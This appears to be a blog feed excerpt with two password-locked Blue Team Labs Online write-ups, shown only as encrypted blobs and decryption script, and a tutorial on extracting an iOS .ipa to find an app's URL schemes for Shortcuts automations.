Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-04-07T14:08:17-04:002022-04-07T14:08:17-04:00Eric Turnertag:blog.ericturner.it,2022-04-07:/2022/04/07/btlo-investigation-exposed/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">ec+lNDkG0qclMdOmsWNQDA==;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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-04-01T14:56:06-04:002022-04-01T14:56:06-04:00Eric Turnertag:blog.ericturner.it,2022-04-01:/2022/04/01/finding-x-callback-url-deep-link-of-ios-apps/

<p>I find often I like doing automations between apps. While you can use the <code>Open App</code> functionality with Shortcuts, trying to open an app from something like a Reminder requires a URL. This guide shows you how to get the iOS App from the App Store for investigation and then …</p>

<p>I find often I like doing automations between apps. While you can use the <code>Open App</code> functionality with Shortcuts, trying to open an app from something like a Reminder requires a URL. This guide shows you how to get the iOS App from the App Store for investigation and then search through the file for the URL Scheme. </p> <p>It would be worthwhile to check the following sites for any existing documentation on deep links or x-callback-urls before diving in yourself:</p> <ul> <li><a href="https://www.appsight.io/">AppSight.io</a></li> <li><a href="http://x-callback-url.com/apps/">X-Callback-Url.com</a></li> <li><a href="https://onetapless.com/library">One Tap Less</a></li> <li><a href="https://app-talk.com/">AppTalk</a></li> <li><a href="https://github.com/timonus/OpenerManifest">Opener</a></li> <li><a href="https://airtable.com/shrydOqT26KkIYWnd">AirTable - List of Apps with x-callback-url</a> (from <a href="https://www.reddit.com/r/shortcuts/comments/ral96l/list_of_apps_with_xcallbackurl/">Reddit</a>) </li> </ul> <p>In this example, I am using my MacBook running macOS Monterey 12.3 with my iPhone 12 Pro Max running 15.4. The app we are going to look at is <a href="https://apps.apple.com/us/app/id1090990601">Tally by Reflectly ApS</a>.</p> <h1 id="getting-an-ipa-file-macos-only">Getting an .ipa File (macOS only)</h1> <p>First we need to get a copy of the app for some light reverse engineering. The easiest way I have found comes from this <a href="https://medium.com/@b0661064248/how-can-i-get-ipa-of-any-app-which-is-available-on-app-store-3a403be7b028">2019 Medium Article by Blazej SLEBODA</a>, whose steps I have reproduced below:</p> <p>1. Connect your device to your Mac and open Apple Configurator. Once the device loads, you can tap it on screen to load:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image.webp"/></p> <p>Our Device in Apple Configurator</p> <p>2. On the top bar, Click the <code>+ Add</code> button and click Apps. A new window will appear, sign in to your Apple account that contains the app you have already purchased/downloaded before:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-1.webp"/></p> <p>Sign in</p> <p>3. Once signed in, choose the app you wish to have a copy of. It will begin downloading on your Mac.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-2.webp"/></p> <p>4. Wait until it downloads and a screen appears like so:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-3.webp"/></p> <p>Downloaded App, waitinf for futher instruction</p> <p><strong>Don't click anything!</strong> The location of the app can be found here:</p> <div class="highlight"><pre><span></span><code>~/Library/Group<span class="se">\ </span>Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps </code></pre></div> <p>Navigate to it either in Finder (remove the <code>\</code> from <code>Group\ Containers</code>) or in Terminal. It will be inside two more nested folders:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-4.webp"/></p> <p>File</p> <p>5. Copy this ipa to somewhere safe such as ~/Downloads. Now you may click Skip in Apple Configurator which will delete the file from this temp directory. Apple Configurator is no longer needed.</p> <h1 id="opening-the-ipa-file">Opening the .ipa File</h1> <p>Using Terminal again, navigate to where you saved the file. So if it was in your Downloads, <code>cd ~/Downloads</code>. Next run the following to unzip the .ipa into a folder:</p> <div class="highlight"><pre><span></span><code><span class="c1"># the format is unzip app.ipa -d directory</span> $<span class="w"> </span>unzip<span class="w"> </span>Tally<span class="se">\ </span><span class="m">1</span>.22.0.ipa<span class="w"> </span>-d<span class="w"> </span>AppFolder </code></pre></div> <p>Once finished, <code>cd AppFolder</code> to jump into the new extracted information (or look at it in Finder). In my case, there was a file in <code>/Downloads/AppFolder/Payload/Tally.app</code>. With finder, right-click and <code>Show Package Contents</code> or <code>cd</code> into it with Terminal.</p> <h1 id="finding-the-callback-url">Finding the Callback URL</h1> <p>The file we need is <code>Info.plist</code>. Open it in finder or display it in Terminal with <code>cat Info.plist</code>, you are looking for <code>CFBundleURLSchemes</code>:</p> <div class="highlight"><pre><span></span><code>.... <span class="w"> </span><span class="nt">&lt;key&gt;</span>CFBundleURLTypes<span class="nt">&lt;/key&gt;</span> <span class="w"> </span><span class="nt">&lt;array&gt;</span> <span class="w"> </span><span class="nt">&lt;dict&gt;</span> <span class="w"> </span><span class="nt">&lt;key&gt;</span>CFBundleURLName<span class="nt">&lt;/key&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;key&gt;</span>CFBundleURLSchemes<span class="nt">&lt;/key&gt;</span> <span class="w"> </span><span class="nt">&lt;array&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>db-w65wxt0sdd1hjk2<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;/array&gt;</span> <span class="w"> </span><span class="nt">&lt;/dict&gt;</span> <span class="w"> </span><span class="nt">&lt;/array&gt;</span> .... </code></pre></div> <p>In my case, I see <code>db-w65wxt0sdd1hjk2</code>. On our iPhone, we can open Safari to test by going to <code>db-w65wxt0sdd1hjk2://</code> in the address bar</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/FC_20220401_0058.webp"/></p> <p>Our deeplink works!</p> <h2 id="example-2-shortcuts-app">Example 2 - Shortcuts App</h2> <p>Some apps have many options, as seen below with Apple's Shortcuts app. In this case, any one of the URL schemes will work in Safari / Shortcuts such as <code>shortcuts://</code> or <code>workflow://</code>.</p> <div class="highlight"><pre><span></span><code><span class="nt">&lt;dict&gt;</span> <span class="w"> </span><span class="nt">&lt;key&gt;</span>CFBundleTypeRole<span class="nt">&lt;/key&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>Editor<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;key&gt;</span>CFBundleURLName<span class="nt">&lt;/key&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>is.workflow.app.url-scheme<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;key&gt;</span>CFBundleURLSchemes<span class="nt">&lt;/key&gt;</span> <span class="w"> </span><span class="nt">&lt;array&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>shortcuts-production<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>shortcuts<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow000000<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow1B9AF7<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow7B72E9<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow49E845<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow55DAE1<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow3871DE<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflow19BD03<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowA9A9A9<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowDB49D8<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowED4694<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowFD6631<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowFE9949<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowFEC418<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowFF4351<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;string&gt;</span>workflowFFD426<span class="nt">&lt;/string&gt;</span> <span class="w"> </span><span class="nt">&lt;/array&gt;</span> <span class="nt">&lt;/dict&gt;</span> </code></pre></div>2022-03-31T15:21:21-04:002022-03-31T15:21:21-04:00Eric Turnertag:blog.ericturner.it,2022-03-31:/2022/03/31/btlo-challenge-thepackage/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">YFZOR0p7S6yfxqoCjOY7yA==;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